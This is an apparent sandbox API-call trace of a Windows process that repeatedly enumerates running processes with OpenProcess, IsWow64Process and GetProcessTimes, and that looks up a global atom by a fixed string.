	[0123.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.779] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.779] CloseHandle (hObject=0x69c) returned 1
	[0123.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.780] CloseHandle (hObject=0x69c) returned 1
	[0123.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.780] CloseHandle (hObject=0x69c) returned 1
	[0123.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.780] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.780] CloseHandle (hObject=0x69c) returned 1
	[0123.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.781] CloseHandle (hObject=0x69c) returned 1
	[0123.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.781] CloseHandle (hObject=0x69c) returned 1
	[0123.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.781] CloseHandle (hObject=0x69c) returned 1
	[0123.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.781] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.781] CloseHandle (hObject=0x69c) returned 1
	[0123.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.782] CloseHandle (hObject=0x69c) returned 1
	[0123.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.782] CloseHandle (hObject=0x69c) returned 1
	[0123.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.782] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.782] CloseHandle (hObject=0x69c) returned 1
	[0123.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.783] CloseHandle (hObject=0x69c) returned 1
	[0123.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.783] CloseHandle (hObject=0x69c) returned 1
	[0123.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.783] CloseHandle (hObject=0x69c) returned 1
	[0123.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.783] CloseHandle (hObject=0x69c) returned 1
	[0123.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.784] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.784] CloseHandle (hObject=0x69c) returned 1
	[0123.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.784] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.784] CloseHandle (hObject=0x69c) returned 1
	[0123.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.784] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.784] CloseHandle (hObject=0x69c) returned 1
	[0123.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.784] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.784] CloseHandle (hObject=0x69c) returned 1
	[0123.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.785] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.785] CloseHandle (hObject=0x69c) returned 1
	[0123.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.785] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.785] CloseHandle (hObject=0x69c) returned 1
	[0123.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.785] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.785] CloseHandle (hObject=0x69c) returned 1
	[0123.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.785] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.785] CloseHandle (hObject=0x69c) returned 1
	[0123.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.786] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.789] CloseHandle (hObject=0x69c) returned 1
	[0123.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.789] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.789] CloseHandle (hObject=0x69c) returned 1
	[0123.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.790] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.790] CloseHandle (hObject=0x69c) returned 1
	[0123.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.790] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.790] CloseHandle (hObject=0x69c) returned 1
	[0123.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.790] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.790] CloseHandle (hObject=0x69c) returned 1
	[0123.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.791] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.791] CloseHandle (hObject=0x69c) returned 1
	[0123.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.791] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.791] CloseHandle (hObject=0x69c) returned 1
	[0123.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.792] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.792] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.792] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.793] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.793] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.793] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.793] CloseHandle (hObject=0x69c) returned 1
	[0123.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.793] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.793] CloseHandle (hObject=0x69c) returned 1
	[0123.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.793] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.793] CloseHandle (hObject=0x69c) returned 1
	[0123.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.794] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.794] CloseHandle (hObject=0x69c) returned 1
	[0123.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.794] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.794] CloseHandle (hObject=0x69c) returned 1
	[0123.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.794] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.794] CloseHandle (hObject=0x69c) returned 1
	[0123.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.831] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.831] CloseHandle (hObject=0x69c) returned 1
	[0123.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.831] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.831] CloseHandle (hObject=0x69c) returned 1
	[0123.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.832] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.832] CloseHandle (hObject=0x69c) returned 1
	[0123.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.832] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.832] CloseHandle (hObject=0x69c) returned 1
	[0123.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.833] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.833] CloseHandle (hObject=0x69c) returned 1
	[0123.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.833] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.833] CloseHandle (hObject=0x69c) returned 1
	[0123.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.833] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.833] CloseHandle (hObject=0x69c) returned 1
	[0123.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.833] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.833] CloseHandle (hObject=0x69c) returned 1
	[0123.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.834] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.834] CloseHandle (hObject=0x69c) returned 1
	[0123.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.834] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.834] CloseHandle (hObject=0x69c) returned 1
	[0123.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.834] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.834] CloseHandle (hObject=0x69c) returned 1
	[0123.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.836] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.836] CloseHandle (hObject=0x69c) returned 1
	[0123.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.836] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.836] CloseHandle (hObject=0x69c) returned 1
	[0123.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.837] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.837] CloseHandle (hObject=0x69c) returned 1
	[0123.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.837] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.837] CloseHandle (hObject=0x69c) returned 1
	[0123.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.837] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.837] CloseHandle (hObject=0x69c) returned 1
	[0123.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.837] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.837] CloseHandle (hObject=0x69c) returned 1
	[0123.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.838] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.838] CloseHandle (hObject=0x69c) returned 1
	[0123.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.838] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.838] CloseHandle (hObject=0x69c) returned 1
	[0123.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.838] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.838] CloseHandle (hObject=0x69c) returned 1
	[0123.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.838] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.838] CloseHandle (hObject=0x69c) returned 1
	[0123.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.838] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.838] CloseHandle (hObject=0x69c) returned 1
	[0123.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.839] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.839] CloseHandle (hObject=0x69c) returned 1
	[0123.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.839] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.839] CloseHandle (hObject=0x69c) returned 1
	[0123.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.839] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.839] CloseHandle (hObject=0x69c) returned 1
	[0123.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.839] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.839] CloseHandle (hObject=0x69c) returned 1
	[0123.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.839] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.840] CloseHandle (hObject=0x69c) returned 1
	[0123.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.840] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.840] CloseHandle (hObject=0x69c) returned 1
	[0123.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.840] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.840] CloseHandle (hObject=0x69c) returned 1
	[0123.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.841] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.841] CloseHandle (hObject=0x69c) returned 1
	[0123.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.841] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.841] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.841] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.842] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.842] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.843] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.843] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.843] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.843] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.843] CloseHandle (hObject=0x69c) returned 1
	[0123.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.843] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.843] CloseHandle (hObject=0x69c) returned 1
	[0123.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.843] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.844] CloseHandle (hObject=0x69c) returned 1
	[0123.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.844] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.844] CloseHandle (hObject=0x69c) returned 1
	[0123.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.844] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.844] CloseHandle (hObject=0x69c) returned 1
	[0123.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.844] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.844] CloseHandle (hObject=0x69c) returned 1
	[0123.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.903] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.903] CloseHandle (hObject=0x69c) returned 1
	[0123.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.903] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.903] CloseHandle (hObject=0x69c) returned 1
	[0123.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
